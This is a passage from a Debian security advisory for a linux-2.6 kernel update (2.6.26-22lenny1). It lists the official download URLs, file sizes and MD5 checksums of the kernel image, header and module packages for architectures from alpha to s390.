82fc153ba577607964e55ce0d5eba8a8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_alpha.deb Size/MD5 checksum: 110404 9e24c63932b52a18206f951f18438a90 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_alpha.deb Size/MD5 checksum: 760714 dbef4d63df60be4c54e5a8999b2f1203 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-22lenny1_alpha.deb Size/MD5 checksum: 28661322 db654cfdd26ec48b75fbf73bae54d15b

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 391290 529d0af88248eeb9db6c720147c3c9c9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 1809098 2119049dd7757d1a7aa9b0cb6d65a4e6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 753158 c06cd160c023755232e79c187b20a98e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 391970 7e2145ea394dcbd739307b7cff343ffc http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 387348 d76eb180fa81f742ee87d9524f3bc5a3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 20949852 a3c0bd81f9f9cc96d2e42521fb963fb9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 3757248 db362b7459220059221418a2b1542659 http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 110338 19ec7c8ca6e51c0a93352a059f9d5df8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 19315990 c185e17d0ca1ed640106dbb828c919f8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 110374 0e703e2b4306ca1e68cc61460ef86686 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 21102730 604476ba9a35fdb435b4409e5323cf89 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 3724662 ae8fed857d819d7a3dd5b3085c367085 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 3780338 a2cd8cdd414be8c412bd923576ccb456 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 3856722 9621b8e802a4e482de1db03572b0f72d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 20931422 9d71c45188552af06abd5a04d62b7c84 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 110350 acdbea58008fec881f380752f9fc3ea6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 397220 709b723fefd37764ab8bffb079eb312f

arm architecture (ARM)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 12494622 96304f7aa2bddb3ea2ef404afaa4a513 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 352980 44e27ad26963a2c1dbed9240b28d7c5b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 10294730 8066047f7d15cd2f7a6c93018cfaae37 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 369410 e26f28edccaeabf04dec8e4d2d8cc88f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 11443274 d9232ed2bbde0e851f72488a2eea831d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 110444 631821dedb019f48b3133246338f4521 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 751260 027d7225ddd40e26f12a9c7c7cc17b55 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 4140556 a36e76af416da97176639d34a6dd42a2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 368088 8388881b72ce56cef47cb61a51abfe8d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 11731284 cc6e8949fe66950db619eb2996332572 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 110404 611a83d9ddb07104525d3ae7eca714b8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 364180 878a5bd8fa6419dd6efe6422c7a14cbc

armel architecture (ARM EABI)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 365700 0327b96ec1802e56c4ffee19ce1c9dc5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 368810 05ee76d995844fc8461223846ab41802 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 110358 830c76ccdf7d7c99f3ea84e1e8bc962d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 11691670 0ecbec767291466b244fd83506f1e112 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 110392 c64900dc9ec3812df164d47c006ecffe http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 11399558 2d16b67f176b8223bd4dd33b90217a2e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 340088 3b6e8d8210d6e6e68eee6ddc2cab8f09 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 4136736 42aebe2283d941bb7724daf03882914d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 12451186 f22b998fbdfa29023573bf9b6988dba9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 751906 d1d0480ba764b4ca3bdae8a651acd066 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 9606938 569b72a642446ac1ffe4ed2aa13f50aa http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 370546 a3f2c479e65c9ae3be17641001b33afc

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 302516 dd1800b19f0df391bd05658a0a7846c0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 110354 479a0788049f39e648e57a3c5007b993 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 3598606 4429cb37eda685553dde7198e5b47fd5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 762928 fe2e02babc93f6bdcc16c8f7ad8a5a88 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 301842 1e58cca757600c08424118ace4a50da5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 110374 9198f6103932b14d766b0e4c32110806 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 301034 890ed76fde4dedddcb9db60f7ba0091d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 17127808 a2cffd928aa5e30ab9f1f30e41b9aed1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 17678124 53aa5bddb6f2af761a8bfcb1fef54d02 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 15784596 c892e98e5ab6fcf6aa84aa5e5021309f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 16388546 0ce6b1186e64e745a0680088d2c9fcad http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 303348 6991ba8c20ae638798fda57540014d30

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 399720 ee32214acdf697edca92068f2d64f8b3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 110450 191bb7f29ece9f8ea2f8cff03efae3cd http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 398126 32ef574340b20e8f2c7465f2290a8c0b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 413242 a5f35b11ae06961132fd16e21d5b5337 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 409820 586c33fc476019b08a3b75816d9bf520 http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 110392 3f9c02cb47bc1070b92358227e030768 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 20530142 c8e9146e82955c0dda3bcabe8b7542ef http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 20509696 98b0e600e9bca75f016f1c4878d9d8e7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 767274 369a4858f7dfa2560ec664a08fdbac42 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 3865974 0510efa636bb1554f9a2c040c1ee6f19 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 20409094 798b4bb9a4b8d81affc30dbc2f284cc3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 20679068 6b6c2a57037f510313311d76849a9b0a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 3807640 6b21b3346b8196f19ea59d16a2e7b8f4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 18198474 627d51edc59f86bd8dfe2e7a74a25723 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 20381812 493e6acfd2d47e456d1471ef44dd18ba http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 1596580 5f456e26e01a793881871f4d683b13b1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 417750 057786734b1771be73cea6c484a09cce http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 410364 4f381b525756e6cf131be68398e58fe7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 110394 46fba74b6675f6df2057da14ba3931f9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 409858 99ce0b8165bd71e4b90745ad5a7577d1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 3947966 aabcdf68ca8c4d35d87ad2eecb569517 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 20350468 fb0caa5f722a968820562223577a4e74 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 21022322 befe070ada9e62a69c15f38c9f0e706a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 3842206 b5e7820e844761d65d8dbf0a4ea639e5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 411454 771b6960fbfd4658124eac3673e01e90

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 359186 d2391d9bdb5fe861abe5fbd0f9f2f989 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 3659176 8df0d712004a67cafedb9b4926970368 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 359256 18a5fda7c38b900462ea120ae04a3c98 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 34440420 2eddbf5140a8dc8a4a74d4e11a77ea44 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 751862 329f5ddfc14f4f6e63aa3834f7a927fe http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 3691882 19f4f11bbad0443a7ae7153823bcc0e7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 359722 f3d89cc673ff0f2e5b7ff2e718ff44f1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 34252074 96729f987e7b7e02802b240da3a3293c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 34376386 f97af824a762b90b102d84f5c1bf65f8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 110350 9881f68b5f5446c4c773dc60d655a589 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 34191126 c5412cb1277801d2a2488be36dc1ad0e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 110386 c1ddbef0eeae94731617e277b32018c6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 359654 cba07c82268fc13d6007ecf4be2c8508

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 262068 31c1aadffe81551bef675f9bc91b6f1e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 29432478 38c75d466da039b9e2ac1c70898b50ae http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 358936 9ec1ce1473362c253cf4dc7d2fd791f6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 3966442 111674b840698cede9cdf3ecec2d5e3b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 302384 7f9f26f809e46a4748158588402d7ace http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 359360 d07b20a27666a8cb2c43f03eeb729c57 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 285392 9d513d80efd66be3e9ba7fa929b13b5f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 303780 3a507cccd77e01f7449a8ff73a3e5f6f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 760156 80eaea319450a06fe9c2310bdff051e2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 23504896 f928208abb4eb3ade6185409df5fa417 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 20252984 09ee52755ae4cf03ca082e8dbc977206 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 20244176 3c568fce5cab57746ca1dc53c8fcc754 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 110400 6676cd4c8df659937bac47ed0c08bf37 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 110464 fcbbce5e6741f1a1ec4830dba9a8ee91 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 11542616 0ead2243e1d4c2cb50760d97f9a6a2f7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 15769388 08c7a66b4f1a5c9bc9f8cc5683d5786f

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 19682018 7e665290822815634b1666523270919e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 110460 445931c0ad4fa00f8875f5cbaf9d83aa http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 19667420 02ae9fef2fea1c4ccd667c73025039f9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 760930 064ffab1507d84791e943528662e4c86 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 297650 4433daa21c6e697d8c1bb33355e14ee1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 359828 870a33c1aea0535ab0b25f3016aa9623 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 23074870 998294807dde61335d413ecf50fdbf3b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 3967560 590a467f25e74daf442dfd54caaf104e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 303240 9620ba551b29adb6052e13f8277347c0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 302768 59fe05d578020afc8e1e8fe3fce3b41c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 28568828 86e20054979d1ffc56c24f5db73d044a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 110406 3a073335ba3488e55549b82e005fefda http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 15056072 429c33859de62cdfaa86e809e8625bec http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 359706 43272f2843e3b39735812c24aad332f5

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 110358 eb7bc8e6a28a6801bc7be5d22bf95a2f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 23581674 48797e6c39bef5a0fd120d973b541f07 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 363808 c2c489e8798d50db73d709367e390113 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc-smp_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 365378 a4c38de9a287a71e84d09d5474393d41 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-powerpc_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 110392 9dd420c73a4b0c7d55fe2372a439adfb http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc64_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 23420066 5bf69b74154de2ae05db3280f2070b74 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 3782640 31d483da8ccb87dbd7f75200515c8b3f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc64_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 23474914 42ba4ae5a23355aba50cb1a8c018a631 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 366524 a3970adc5168a37d49f28c5ce4ca05ff http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 746782 d0ef1631862e4130479ce4e3da0a6050 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 3814900 2b936155fef59a231764ca014043b806 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc64_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 370710 35281c3da9947c322b12a014adabbcad http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 23159310 22caa95faeb5687d37e677b4e34503b6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc64_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 371066 9961d473b25000f7bb7a23bde2720323 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc-smp_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 23557104 bd8ab7bd0594a795f34dac94ee24ffae

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 758022 786d9ca518b1a573caf38f5492104cc4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 238208 3155d20f0210f5fd9a2e27fc28165502 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 236574 05d74c2012431ee9bdae90e172a82de0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 237136 7950ba3ebfc31e3cf6536b34eccaf684 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 7828888 56510e3515975d5ed979a55fb0bb14b7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 1633146 654e757be4670f764a99049c7984aa98 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 3633806 0c911d5a677f4fdb22f44cf617cd8374 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 7534830 da50ed9bfd6846d2ab2ced362b19ab4e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 7889984 06c9c7d89731808d7e376986cc472843 